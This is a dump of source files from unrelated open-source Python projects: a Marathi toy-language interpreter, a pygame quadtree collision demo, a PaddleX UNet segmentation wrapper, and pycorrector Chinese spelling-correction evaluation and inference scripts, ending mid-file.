from Parser import Parser
from Interpreter import Interpreter
from Context import Context
from SymbolTable import global_symbol_table
import sys
#------------EXECUTE--------------
# ------------RUN-----------------
context =None
def run(fn, text, debug=False):
global context
lexer = Lexer(fn, text)
# Genarate Tokens
tokens, error = lexer.make_tokens()
if error:
return None, error
# Generate AST
parser = Parser(tokens)
ast = parser.parse()
if debug:
print("---symbols--\n")
print(global_symbol_table.symbols, "\n")
print("---tokens--\n")
print(tokens, "\n")
print("--AST--\n")
print(ast.node, "\n")
print("--output--\n")
if ast.error:
return None, ast.error
# Run program
interpreter = Interpreter()
context = Context("<program>")
context.symbol_table = global_symbol_table
result = interpreter.visit(ast.node, context)
return result.value, result.error
def run_from_file(file_name):
splits = file_name.strip().split(".")
if len(splits)<2:
print("Invalid argument")
name = "".join(splits[:-1])
extension = splits[-1].lower()
if extension!='baji':
print("File extension should .baji")
print(f"Found -> {extension}")
exit()
try:
with open(file_name , 'r',encoding='utf-8') as f:
script = f.read()
except BaseException as e:
print("Failed to load Script")
print(str(e))
_,error = run(f"<{name}>", script, debug=False)
if error:
print(error.as_string())
if __name__=="__main__":
args = sys.argv
if len(args)>1:
run_from_file(args[1])
else:
print("Provide file name")
```
#### File: Marathi-Programing-Language/values/number.py
```python
from Values.value import Value
from Errors import RTError
from Translate import Translate
#------------Values-----------------
class Number(Value):
def __init__(self, value):
super().__init__()
self.value = value
self.translate = Translate()
def set_pos(self, pos_start=None, pos_end=None):
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self, context=None):
self.context = context
return self
def added_to(self, other):
if isinstance(other, Number):
return Number(self.value + other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def subbed_by(self, other):
if isinstance(other, Number):
return Number(self.value - other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def multed_by(self, other):
if isinstance(other, Number):
return Number(self.value * other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def dived_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Division by zero',
self.context
)
div = self.value / other.value
#👇convert float->int if if int==float
div = int(div) if int(div)==div else div
return Number(div).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def moded_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Mod by zero',
self.context
)
div = self.value % other.value
#👇convert float->int if if int==float
div = int(div) if int(div)==div else div
return Number(div).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def power_by(self,other):
if isinstance(other,Number):
return Number(self.value ** other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_eq(self, other):
if isinstance(other, Number):
return Number(int(self.value == other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_ne(self, other):
if isinstance(other, Number):
return Number(int(self.value != other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lt(self, other):
if isinstance(other, Number):
return Number(int(self.value < other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gt(self, other):
if isinstance(other, Number):
return Number(int(self.value > other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lte(self, other):
if isinstance(other, Number):
return Number(int(self.value <= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gte(self, other):
if isinstance(other, Number):
return Number(int(self.value >= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def anded_by(self, other):
if isinstance(other, Number):
return Number(int(self.value and other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def ored_by(self, other):
if isinstance(other, Number):
return Number(int(self.value or other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def notted(self):
return Number(1 if self.value == 0 else 0).set_context(self.context), None
def copy(self):
copy = Number(self.value)
copy.set_pos(self.pos_start, self.pos_end)
copy.set_context(self.context)
return copy
def is_true(self):
return self.value != 0
def __repr__(self):
return str(self.translate.number_to_mar(self.value))
Number.null = Number(0)
Number.false = Number(0)
Number.true = Number(1)
``` |
{
"source": "joey00072/Quadtree-in-python",
"score": 3
} |
#### File: joey00072/Quadtree-in-python/quadtree.py
```python
import pygame
from math import sin,cos,pi
import math
from pygame.draw import line,circle,rect
from pygame.gfxdraw import aacircle
from pygame import gfxdraw
import random
import time
import numpy as np
import sys
sys.setrecursionlimit(10000)
# random.seed(0)
pygame.init()
HIGHT,WIDTH= 600,600
BLACK=(0,0,0)
WHITE=(255,255,255)
BLUE=(0,0,255)
GRAY=(120,120,120)
DARKGRAY = (10,10,10)
GREEN = (0,250,0)
RED=(255,0,0)
PointRadius=3
CAPACITY = 5
ox,oy = WIDTH//2,HIGHT//2
screen = pygame.display.set_mode((WIDTH,HIGHT))
clock = pygame.time.Clock()
font = pygame.font.SysFont('Comic Sans MS', 30)
class QuadTree(object):
"""docstring for QuadTree"""
def __init__(self, START=(0,0),capacity=5,HIGHT=HIGHT,WIDTH=WIDTH,depth=0,name="ROOT"):
super(QuadTree, self).__init__()
# print(HIGHT,WIDTH,depth,name)
self.Points = []
self.capacity = capacity
self.childern = False
self.START = START
self.NW = None
self.NE = None
self.SW = None
self.SE = None
self.depth = depth
self.name = name
self.HIGHT = WIDTH
self.WIDTH = WIDTH
# print(f"START:{START} {self.name} ")
def divide(self):
# print(len(self.Points))
# if len(self.name)>1000:
# self.capacity=30
self.NW = QuadTree((self.START[0] ,self.START[1] ), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-NW")
self.NE = QuadTree((self.START[0]+self.WIDTH//2 ,self.START[1] ), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-NE")
self.SW = QuadTree((self.START[0] ,self.START[1]+self.HIGHT//2), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-SW")
self.SE = QuadTree((self.START[0]+self.WIDTH//2 ,self.START[1]+self.HIGHT//2), capacity=self.capacity, HIGHT=self.HIGHT//2, WIDTH=self.WIDTH//2, depth=self.depth+1, name=f"{self.name}-SE")
def insert(self,Point):
if not self.childern:
if len(self.Points)< self.capacity:
self.Points.append(Point)
else:
self.Points.append(Point)
self.childern = True
self.divide()
x,y=self.START
for point in self.Points:
# print(f"point: {point.x} , {point.y}")
if (point.x<=x+self.WIDTH//2 and point.y<=y+self.HIGHT//2):
self.NW.insert(point)
elif (point.y<=y+self.HIGHT//2):
self.NE.insert(point)
elif (point.x<=x+self.WIDTH//2):
self.SW.insert(point)
else:
self.SE.insert(point)
else:
self.Points.append(Point)
point=Point
x,y=self.START
if (point.x<=x+self.WIDTH//2 and point.y<=y+self.HIGHT//2):
self.NW.insert(point)
elif (point.y<=y+self.HIGHT//2):
self.NE.insert(point)
elif (point.x<=x+self.WIDTH//2):
self.SW.insert(point)
else:
self.SE.insert(point)
def query(self,box):
cnt=0
START_x,START_y,END_x,END_y=box
self.x,self.y=self.START
if self.x>=START_x and self.y>=START_y and self.x+self.WIDTH<=END_x and self.y+self.HIGHT<=END_y :
return len(self.Points)
if self.x>END_x or self.y>END_y or self.x+self.WIDTH<START_x or self.y+self.HIGHT<START_y :
return 0
if self.childern:
cnt+=self.NW.query(box)
cnt+=self.NE.query(box)
cnt+=self.SW.query(box)
cnt+=self.SE.query(box)
else:
for point in self.Points:
if point.x>=START_x and point.y>=START_y and point.x<=END_x and point.y<=END_y:
cnt+=1
# print(self.name,cnt)
return cnt
def getPointInRange(self,box):
cnt=[]
START_x,START_y,END_x,END_y=box
self.x,self.y=self.START
if self.x>=START_x and self.y>=START_y and self.x+self.WIDTH<=END_x and self.y+self.HIGHT<=END_y :
# print("HDHH")
return self.Points
if self.x>END_x or self.y>END_y or self.x+self.WIDTH<START_x or self.y+self.HIGHT<START_y :
EMPTY=[]
# print(type(EMPTY),"EMPTY")
return EMPTY
if self.childern:
# print(type(cnt),type(self.NW.query(box)) , self.NW.query(box))
cnt=cnt+self.NW.getPointInRange(box)
cnt=cnt+self.NE.getPointInRange(box)
cnt=cnt+self.SW.getPointInRange(box)
cnt=cnt+self.SE.getPointInRange(box)
else:
for point in self.Points:
if point.x>=START_x and point.y>=START_y and point.x<=END_x and point.y<=END_y:
cnt.append(point)
# print(self.name,len(cnt))
# print("74HDHH")
return cnt
def draw(self,deplth=0):
# print(deplth)
if self.childern:
x,y = self.START
line(screen,GRAY,(x,y+(self.HIGHT//2)) , (x+(self.WIDTH),y+(self.HIGHT//2)),1)
line(screen,GRAY,(x+(self.WIDTH//2),y) , (x+(self.WIDTH//2) ,y+(self.HIGHT)),1)
self.NW.draw(deplth+1)
self.NE.draw(deplth+1)
self.SW.draw(deplth+1)
self.SE.draw(deplth+1)
ox,oy = WIDTH//2,HIGHT//2
class Point(object):
"""docstring for Points"""
def __init__(self, x=None,y=None,vx=0,vy=0,mass=1):
super(Point, self).__init__()
self.x = x if x else random.randint(10,WIDTH-12)
self.y = y if y else random.randint(10,WIDTH-12)
self.vx = vx
self.vy = vy
self.mass = mass
self.intersect=False
def display(self,Color=None):
# circle(screen, WHITE if self.intersect else GRAY ,(int(self.x),int(self.y)),PointRadius)
aacircle(screen,int(self.x),int(self.y),PointRadius,WHITE if self.intersect else GRAY )
gfxdraw.filled_circle(screen,int(self.x),int(self.y),PointRadius,WHITE if self.intersect else GRAY )
def randomWalk(self):
global ox,oy
self.x += random.randint(-10,10)/3
self.y += random.randint(-10,10)/3
# dist=self.dist((ox,oy),(self.x,self.y))+5
# self.x += (ox-self.x)/dist
# self.y += (oy-self.y)/dist
# ox,oy = WIDTH//2,HIGHT//2
# ox+=100
# oy+=100
# print(ox,oy)
# self.x -= (self.x-ox ) *0.001
# self.y -= (self.y-oy ) *0.001
# dx=self.dist((ox,oy),(self.x,self.y))
# if self.x<WIDTH//2:
# self.x+=dx*0.001
# else:
# self.x-=dx*0.001
# if self.y<WIDTH//2:
# self.y+=dx*0.001
# else:
# self.y-=dx*0.001
def move(self):
self.x +=self.vx
self.y +=self.vy
def dist(self,p1,p2):
p1x,p1y=p1
p2x,p2y=p2
return math.sqrt( (p2x-p1x)**2 + (p2y-p1y)**2 )
def getCoordinate(self):
return (self.x,self.y)
def setIntersect(self,isIntersect):
# print(isIntersect)
self.intersect = isIntersect
class Universe(object):
"""docstring for Universe"""
def __init__(self, no_of_points=10):
super(Universe, self).__init__()
self.no_of_points = no_of_points
self.allPoints = []
self.Tree = QuadTree(capacity=CAPACITY)
self.initUniverse()
self.g = 1000
def initUniverse(self):
for i in range(self.no_of_points):
point=Point()
self.allPoints.append(point)
self.Tree.insert(point)
for i in range(30):
point=Point(HIGHT//2+100+random.randint(-30,30),WIDTH//2+100+random.randint(-30,30))
self.allPoints.append(point)
self.Tree.insert(point)
for i in range(30):
point=Point(HIGHT//2-100+random.randint(-30,30),WIDTH//2-100+random.randint(-30,30))
self.allPoints.append(point)
self.Tree.insert(point)
def display(self):
for Point in self.allPoints:
Point.display()
Point.randomWalk()
self.Tree.draw()
def walk(self):
for Point in self.allPoints:
Point.move()
def dist(self,p1,p2):
return math.sqrt( (p2.x-p1.x)**2 + (p2.y-p1.y)**2 )
def isColiding(self,p1,p2):
if self.dist(p1,p2)<=PointRadius+10:
# print(PointRadius,self.dist(p1,p2))
return True
else:
return False
def collision(self):
for Point in self.allPoints:
Point.setIntersect(False)
# for i in range(len(self.allPoints)):
# for j in range(i,len(self.allPoints)):
# p1=self.allPoints[i]
# p2=self.allPoints[j]
# if not(p1.x==p2.x and p1.y==p2.y):
# if self.isColiding(p1,p2):
# p1.setIntersect(True)
# p2.setIntersect(True)
for p in self.allPoints:
x,y=p.x,p.y
SIDE=4*PointRadius
lst=U.Tree.getPointInRange((x-SIDE,y-SIDE,x+SIDE,y+SIDE))
for point in lst:
if not (point.x==p.x and point.y==p.y):
ans=self.isColiding(p,point)
p.setIntersect(ans)
if ans:
continue
def gForce(self,p1,p2):
return self.g * p1.mass * p2.mass/ (self.dist(p1,p2))**2
def findAngle(self,p1,p2):
d=self.dist(p1,p2)
x = p1.x -p2.x
y = p1.y -p2.y
return math.atan2(y,x)
def gravity(self):
for p1 in self.allPoints:
for p2 in self.allPoints:
if not (p1.x-p2.x<10 and p1.y-p2.y<10) :
v = self.gForce(p1,p2)/p1.mass
# print(v)
angle = self.findAngle(p1,p2)
# print(angle,"A")
p1.vx += -v*cos(angle)
p1.vy += -v*sin(angle)
def addPoint(self,pos):
x,y = pos
p = Point(x,y)
self.allPoints.append(p)
self.Tree.insert(p)
def update_fps():
fps = str(int(clock.get_fps()))
fps_text = font.render(fps, 1, pygame.Color("coral"))
return fps_text
def lightup(ROOT,vis):
if vis:
return Tree
if ROOT.childern:
if lightup(ROOT.NW,vis):
return True
if lightup(ROOT.NE,vis):
return True
if lightup(ROOT.SW,vis):
return True
if lightup(ROOT.SE,vis):
return True
# if not vis:
# if lightup(ROOT.NE,vis):
# return True
# if not vis:
# vis=lightup(ROOT.NW,vis)
# if not vis:
# vis=lightup(ROOT.SW,vis)
# if not vis:
# vis=lightup(ROOT.SE,vis)
else:
rt=False
for point in ROOT.Points:
if not point.intersect:
print(ROOT.name)
print(point.x,point.y)
point.intersect=True
rt=True
break
return rt
# return True
# def drawRect(ROOT):
# rect(screen,DARKGRAY,(ROOT.START[0],ROOT.START[1],ROOT.WIDTH,ROOT.HIGHT),1)
# if ROOT.childern:
# drawRect(ROOT.NW)
# drawRect(ROOT.NE)
# drawRect(ROOT.SW)
# drawRect(ROOT.SE)
lst=[]
def drawRect(arg):
global lst
lst=[]
if arg:
x,y = arg
SIDE=200
rect(screen,GREEN,(x,y,SIDE,SIDE ),1)
cnt=U.Tree.query((x,y,x+SIDE,y+SIDE))
lst=U.Tree.getPointInRange((x,y,x+SIDE,y+SIDE))
# print(len(lst))
for p in lst:
p.intersect=True
# print(p.x,p.y)
cnt_text = font.render(str(cnt), 1, pygame.Color("coral"))
screen.blit(cnt_text, (WIDTH-50,0))
else:
for pos in lst:
x,y = pos
rect(screen,GREEN,(x,y,100,100 ),1)
def light(ROOT):
try:
NODE=ROOT.NE.SE
lst = NODE.Points
circle(screen,WHITE,(NODE.START[0],NODE.START[1]),10)
print(NODE.START,NODE.HIGHT,NODE.WIDTH)
for point in lst:
point.intersect=True
except Exception as e:
print(e)
U =Universe(100)
# p1=Point(x=HIGHT//2,y=WIDTH//2+100,vx=-5,mass=10)
# p2=Point(x=HIGHT//2,y=WIDTH//2-100,vx=5,mass=10)
# p3=Point(x=0,y=0,mass=5)
# U.allPoints.append(p1)
# U.allPoints.append(p2)
# U.allPoints.append(p3)
# U.allPoints.append(Point(x=10,y=250,vx=10,vy=10,mass=1))
RUN = True
angle=0
# lightup(U.Tree,False)
# lightup(U.Tree,False)
lst=[]
Inital_pos = (int(WIDTH/2),int(HIGHT))
while RUN:
screen.fill(DARKGRAY)
# time.sleep(0.1)
# screen.blit(update_fps(), (10,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
RUN=False
break
if event.type == pygame.MOUSEBUTTONUP:
# pass
pos = pygame.mouse.get_pos()
ox,oy = pos
print(pos,ox,oy)
# lst.append(pos)
# print(pos)
# U.addPoint(pos)
# lightup(U.Tree,False)
# light(U.Tree)
U.walk()
ox,oy =pygame.mouse.get_pos()
# U.gravity()
U.display()
U.collision()
t=time.time()
Tree = QuadTree(capacity=CAPACITY)
for p in U.allPoints:
Tree.insert(p)
U.Tree =Tree
# print(time.time()-t)
# for p in U.allPoints:
# p.intersect=False
# drawRect(pygame.mouse.get_pos())
# print(f"p1 {p1.x} {p1.x}")
# print(f"p2 {p2.x} {p2.x}")
clock.tick(60)
pygame.display.update()
``` |
{
"source": "joey12300/PaddleX",
"score": 2
} |
#### File: cv/models/unet.py
```python
from __future__ import absolute_import
import paddlex
from collections import OrderedDict
from .deeplabv3p import DeepLabv3p
class UNet(DeepLabv3p):
"""实现UNet网络的构建并进行训练、评估、预测和模型导出。
Args:
num_classes (int): 类别数。
upsample_mode (str): UNet decode时采用的上采样方式,取值为'bilinear'时利用双线行差值进行上菜样,
当输入其他选项时则利用反卷积进行上菜样,默认为'bilinear'。
use_bce_loss (bool): 是否使用bce loss作为网络的损失函数,只能用于两类分割。可与dice loss同时使用。默认False。
use_dice_loss (bool): 是否使用dice loss作为网络的损失函数,只能用于两类分割,可与bce loss同时使用。
当use_bce_loss和use_dice_loss都为False时,使用交叉熵损失函数。默认False。
class_weight (list/str): 交叉熵损失函数各类损失的权重。当class_weight为list的时候,长度应为
num_classes。当class_weight为str时, weight.lower()应为'dynamic',这时会根据每一轮各类像素的比重
自行计算相应的权重,每一类的权重为:每类的比例 * num_classes。class_weight取默认值None是,各类的权重1,
即平时使用的交叉熵损失函数。
ignore_index (int): label上忽略的值,label为ignore_index的像素不参与损失函数的计算。默认255。
Raises:
ValueError: use_bce_loss或use_dice_loss为真且num_calsses > 2。
ValueError: class_weight为list, 但长度不等于num_class。
class_weight为str, 但class_weight.low()不等于dynamic。
TypeError: class_weight不为None时,其类型不是list或str。
"""
def __init__(self,
num_classes=2,
upsample_mode='bilinear',
use_bce_loss=False,
use_dice_loss=False,
class_weight=None,
ignore_index=255):
self.init_params = locals()
super(DeepLabv3p, self).__init__('segmenter')
# dice_loss或bce_loss只适用两类分割中
if num_classes > 2 and (use_bce_loss or use_dice_loss):
raise ValueError(
"dice loss and bce loss is only applicable to binary classfication"
)
if class_weight is not None:
if isinstance(class_weight, list):
if len(class_weight) != num_classes:
raise ValueError(
"Length of class_weight should be equal to number of classes"
)
elif isinstance(class_weight, str):
if class_weight.lower() != 'dynamic':
raise ValueError(
"if class_weight is string, must be dynamic!")
else:
raise TypeError(
'Expect class_weight is a list or string but receive {}'.
format(type(class_weight)))
self.num_classes = num_classes
self.upsample_mode = upsample_mode
self.use_bce_loss = use_bce_loss
self.use_dice_loss = use_dice_loss
self.class_weight = class_weight
self.ignore_index = ignore_index
self.labels = None
self.fixed_input_shape = None
def build_net(self, mode='train'):
model = paddlex.cv.nets.segmentation.UNet(
self.num_classes,
mode=mode,
upsample_mode=self.upsample_mode,
use_bce_loss=self.use_bce_loss,
use_dice_loss=self.use_dice_loss,
class_weight=self.class_weight,
ignore_index=self.ignore_index,
fixed_input_shape=self.fixed_input_shape)
inputs = model.generate_inputs()
model_out = model.build_net(inputs)
outputs = OrderedDict()
if mode == 'train':
self.optimizer.minimize(model_out)
outputs['loss'] = model_out
else:
outputs['pred'] = model_out[0]
outputs['logit'] = model_out[1]
return inputs, outputs
def train(self,
num_epochs,
train_dataset,
train_batch_size=2,
eval_dataset=None,
save_interval_epochs=1,
log_interval_steps=2,
save_dir='output',
pretrain_weights='COCO',
optimizer=None,
learning_rate=0.01,
lr_decay_power=0.9,
use_vdl=False,
sensitivities_file=None,
eval_metric_loss=0.05,
early_stop=False,
early_stop_patience=5,
resume_checkpoint=None):
"""训练。
Args:
num_epochs (int): 训练迭代轮数。
train_dataset (paddlex.datasets): 训练数据读取器。
train_batch_size (int): 训练数据batch大小。同时作为验证数据batch大小。默认2。
eval_dataset (paddlex.datasets): 评估数据读取器。
save_interval_epochs (int): 模型保存间隔(单位:迭代轮数)。默认为1。
log_interval_steps (int): 训练日志输出间隔(单位:迭代次数)。默认为2。
save_dir (str): 模型保存路径。默认'output'。
pretrain_weights (str): 若指定为路径时,则加载路径下预训练模型;若为字符串'COCO',
则自动下载在COCO图片数据上预训练的模型权重;若为None,则不使用预训练模型。默认为'COCO'。
optimizer (paddle.fluid.optimizer): 优化器。当改参数为None时,使用默认的优化器:使用
fluid.optimizer.Momentum优化方法,polynomial的学习率衰减策略。
learning_rate (float): 默认优化器的初始学习率。默认0.01。
lr_decay_power (float): 默认优化器学习率多项式衰减系数。默认0.9。
use_vdl (bool): 是否使用VisualDL进行可视化。默认False。
sensitivities_file (str): 若指定为路径时,则加载路径下敏感度信息进行裁剪;若为字符串'DEFAULT',
则自动下载在Cityscapes图片数据上获得的敏感度信息进行裁剪;若为None,则不进行裁剪。默认为None。
eval_metric_loss (float): 可容忍的精度损失。默认为0.05。
early_stop (bool): 是否使用提前终止训练策略。默认值为False。
early_stop_patience (int): 当使用提前终止训练策略时,如果验证集精度在`early_stop_patience`个epoch内
连续下降或持平,则终止训练。默认值为5。
resume_checkpoint (str): 恢复训练时指定上次训练保存的模型路径。若为None,则不会恢复训练。默认值为None。
Raises:
ValueError: 模型从inference model进行加载。
"""
return super(UNet, self).train(
num_epochs, train_dataset, train_batch_size, eval_dataset,
save_interval_epochs, log_interval_steps, save_dir,
pretrain_weights, optimizer, learning_rate, lr_decay_power,
use_vdl, sensitivities_file, eval_metric_loss, early_stop,
early_stop_patience, resume_checkpoint)
``` |
{
"source": "joey12300/pycorrector",
"score": 3
} |
#### File: pycorrector/examples/evaluate_models.py
```python
import argparse
import os
import sys
sys.path.append("../")
import pycorrector
from pycorrector.utils import eval
pwd_path = os.path.abspath(os.path.dirname(__file__))
def demo():
idx_errors = pycorrector.detect('少先队员因该为老人让坐')
print(idx_errors)
def main(args):
if args.data == 'sighan_15' and args.model == 'rule':
demo()
# Sentence Level: acc:0.173225, precision:0.979592, recall:0.148541, f1:0.257965, cost time:230.92 s
eval.eval_sighan2015_by_model(pycorrector.correct)
if args.data == 'sighan_15' and args.model == 'bert':
# right_rate:0.37623762376237624, right_count:38, total_count:101;
# recall_rate:0.3645833333333333, recall_right_count:35, recall_total_count:96, spend_time:503 s
from pycorrector.bert.bert_corrector import BertCorrector
model = BertCorrector()
eval.eval_sighan2015_by_model(model.bert_correct)
if args.data == 'sighan_15' and args.model == 'macbert':
# Sentence Level: acc:0.914885, precision:0.995199, recall:0.916446, f1:0.954200, cost time:29.47 s
from pycorrector.macbert.macbert_corrector import MacBertCorrector
model = MacBertCorrector()
eval.eval_sighan2015_by_model(model.macbert_correct)
if args.data == 'sighan_15' and args.model == 'ernie':
# right_rate:0.297029702970297, right_count:30, total_count:101;
# recall_rate:0.28125, recall_right_count:27, recall_total_count:96, spend_time:655 s
from pycorrector.ernie.ernie_corrector import ErnieCorrector
model = ErnieCorrector()
eval.eval_sighan2015_by_model(model.ernie_correct)
if args.data == 'corpus500' and args.model == 'rule':
demo()
# right_rate:0.486, right_count:243, total_count:500;
# recall_rate:0.18, recall_right_count:54, recall_total_count:300, spend_time:78 s
eval.eval_corpus500_by_model(pycorrector.correct)
if args.data == 'corpus500' and args.model == 'bert':
# right_rate:0.586, right_count:293, total_count:500;
# recall_rate:0.35, recall_right_count:105, recall_total_count:300, spend_time:1760 s
from pycorrector.bert.bert_corrector import BertCorrector
model = BertCorrector()
eval.eval_corpus500_by_model(model.bert_correct)
if args.data == 'corpus500' and args.model == 'macbert':
# Sentence Level: acc:0.724000, precision:0.912821, recall:0.595318, f1:0.720648, cost time:6.43 s
from pycorrector.macbert.macbert_corrector import MacBertCorrector
model = MacBertCorrector()
eval.eval_corpus500_by_model(model.macbert_correct)
if args.data == 'corpus500' and args.model == 'ernie':
# right_rate:0.598, right_count:299, total_count:500;
# recall_rate:0.41333333333333333, recall_right_count:124, recall_total_count:300, spend_time:6960 s
from pycorrector.ernie.ernie_corrector import ErnieCorrector
model = ErnieCorrector()
eval.eval_corpus500_by_model(model.ernie_correct)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default='sighan_15', help='evaluate dataset, sighan_15/corpus500')
parser.add_argument('--model', type=str, default='rule', help='which model to evaluate, rule/bert/macbert/ernie')
args = parser.parse_args()
main(args)
```
#### File: pycorrector/deepcontext/preprocess.py
```python
import os
import sys
from xml.dom import minidom
sys.path.append('../..')
from pycorrector.utils.tokenizer import segment
from pycorrector.deepcontext import config
def parse_xml_file(path, use_segment, segment_type):
print('Parse data from %s' % path)
word_arr = []
dom_tree = minidom.parse(path)
docs = dom_tree.documentElement.getElementsByTagName('DOC')
for doc in docs:
# Input the text
text = doc.getElementsByTagName('CORRECTION')[0]. \
childNodes[0].data.strip()
# Segment
word_seq = ' '.join(segment(text.strip(), cut_type=segment_type)) if use_segment else text.strip()
word_arr.append(word_seq)
return word_arr
def get_data_file(path, use_segment, segment_type):
data_list = []
with open(path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line.startswith("#"):
continue
parts = line.split("\t")
if len(parts) != 2:
continue
target = ' '.join(segment(parts[1].strip(), cut_type=segment_type)) if use_segment else parts[1].strip()
data_list.append(target)
return data_list
def save_corpus_data(data_list, data_path):
dirname = os.path.dirname(data_path)
os.makedirs(dirname, exist_ok=True)
with open(data_path, 'w', encoding='utf-8') as f:
count = 0
for line in data_list:
f.write(line + '\n')
count += 1
print("save line size:%d to %s" % (count, data_path))
if __name__ == '__main__':
# train data
data_list = []
if config.dataset == 'sighan':
data = get_data_file(config.sighan_train_path, config.use_segment, config.segment_type)
data_list.extend(data)
else:
for path in config.cged_train_paths:
data_list.extend(parse_xml_file(path, config.use_segment, config.segment_type))
# save data
save_corpus_data(data_list, config.train_path)
```
#### File: pycorrector/macbert/infer.py
```python
import sys
import operator
import torch
from transformers import BertTokenizer
sys.path.append('../..')
from pycorrector.macbert.macbert4csc import MacBert4Csc
from pycorrector.macbert.softmaskedbert4csc import SoftMaskedBert4Csc
from pycorrector.macbert.defaults import _C as cfg
from pycorrector.utils.logger import logger
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Inference:
def __init__(self, ckpt_path='output/macbert4csc/epoch=09-val_loss=0.01.ckpt',
vocab_path='output/macbert4csc/vocab.txt',
cfg_path='train_macbert4csc.yml'):
logger.debug("device: {}".format(device))
self.tokenizer = BertTokenizer.from_pretrained(vocab_path)
cfg.merge_from_file(cfg_path)
if 'macbert4csc' in cfg_path:
self.model = MacBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,
cfg=cfg,
map_location=device,
tokenizer=self.tokenizer)
elif 'softmaskedbert4csc' in cfg_path:
self.model = SoftMaskedBert4Csc.load_from_checkpoint(checkpoint_path=ckpt_path,
cfg=cfg,
map_location=device,
tokenizer=self.tokenizer)
else:
raise ValueError("model not found.")
self.model.eval()
self.model.to(device)
logger.debug("device: {}".format(device))
def predict(self, sentence_list):
"""
文本纠错模型预测
Args:
sentence_list: list
输入文本列表
Returns: tuple
corrected_texts(list)
"""
is_str = False
if isinstance(sentence_list, str):
is_str = True
sentence_list = [sentence_list]
corrected_texts = self.model.predict(sentence_list)
if is_str:
return corrected_texts[0]
return corrected_texts
def predict_with_error_detail(self, sentence_list):
"""
文本纠错模型预测,结果带错误位置信息
Args:
sentence_list: list
输入文本列表
Returns: tuple
corrected_texts(list), details(list)
"""
details = []
is_str = False
if isinstance(sentence_list, str):
is_str = True
sentence_list = [sentence_list]
corrected_texts = self.model.predict(sentence_list)
def get_errors(corrected_text, origin_text):
sub_details = []
for i, ori_char in enumerate(origin_text):
if ori_char in [' ', '“', '”', '‘', '’', '琊', '\n', '…', '—', '擤']:
# add unk word
corrected_text = corrected_text[:i] + ori_char + corrected_text[i:]
continue
if i >= len(corrected_text):
continue
if ori_char != corrected_text[i]:
if ori_char.lower() == corrected_text[i]:
# pass english upper char
corrected_text = corrected_text[:i] + ori_char + corrected_text[i + 1:]
continue
sub_details.append((ori_char, corrected_text[i], i, i + 1))
sub_details = sorted(sub_details, key=operator.itemgetter(2))
return corrected_text, sub_details
for corrected_text, text in zip(corrected_texts, sentence_list):
corrected_text, sub_details = get_errors(corrected_text, text)
details.append(sub_details)
if is_str:
return corrected_texts[0], details[0]
return corrected_texts, details
if __name__ == "__main__":
ckpt_path = sys.argv[1]
vocab_path = sys.argv[2]
cfg_path = sys.argv[3]
m = Inference(ckpt_path,
vocab_path,
cfg_path)
inputs = [
'它的本领是呼风唤雨,因此能灭火防灾。狎鱼后面是獬豸。獬豸通常头上长着独角,有时又被称为独角羊。它很聪彗,而且明辨是非,象征着大公无私,又能镇压斜恶。',
'老是较书。',
'感谢等五分以后,碰到一位很棒的奴生跟我可聊。',
'遇到一位很棒的奴生跟我聊天。',
'遇到一位很美的女生跟我疗天。',
'他们只能有两个选择:接受降新或自动离职。',
'王天华开心得一直说话。',
'你说:“怎么办?”我怎么知道?',
]
outputs = m.predict(inputs)
for a, b in zip(inputs, outputs):
print('input :', a)
print('predict:', b)
print()
# 在sighan2015数据集评估模型
# macbert4csc Sentence Level: acc:0.7845, precision:0.8174, recall:0.7256, f1:0.7688, cost time:10.79 s
# softmaskedbert4csc Sentence Level: acc:0.6964, precision:0.8065, recall:0.5064, f1:0.6222, cost time:16.20 s
from pycorrector.utils.eval import eval_sighan2015_by_model
eval_sighan2015_by_model(m.predict_with_error_detail)
```
#### File: pycorrector/macbert/reader.py
```python
import os
import json
import torch
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
class DataCollator:
def __init__(self, tokenizer):
self.tokenizer = tokenizer
def __call__(self, data):
ori_texts, cor_texts, wrong_idss = zip(*data)
encoded_texts = [self.tokenizer.tokenize(t) for t in ori_texts]
max_len = max([len(t) for t in encoded_texts]) + 2
det_labels = torch.zeros(len(ori_texts), max_len).long()
for i, (encoded_text, wrong_ids) in enumerate(zip(encoded_texts, wrong_idss)):
for idx in wrong_ids:
margins = []
for word in encoded_text[:idx]:
if word == '[UNK]':
break
if word.startswith('##'):
margins.append(len(word) - 3)
else:
margins.append(len(word) - 1)
margin = sum(margins)
move = 0
while (abs(move) < margin) or (idx + move >= len(encoded_text)) \
or encoded_text[idx + move].startswith('##'):
move -= 1
det_labels[i, idx + move + 1] = 1
return ori_texts, cor_texts, det_labels
class CscDataset(Dataset):
